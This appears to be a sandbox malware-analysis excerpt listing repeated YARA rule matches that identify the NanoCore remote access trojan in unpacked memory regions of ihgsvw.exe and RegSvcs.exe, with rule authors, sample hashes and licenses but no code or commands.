      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
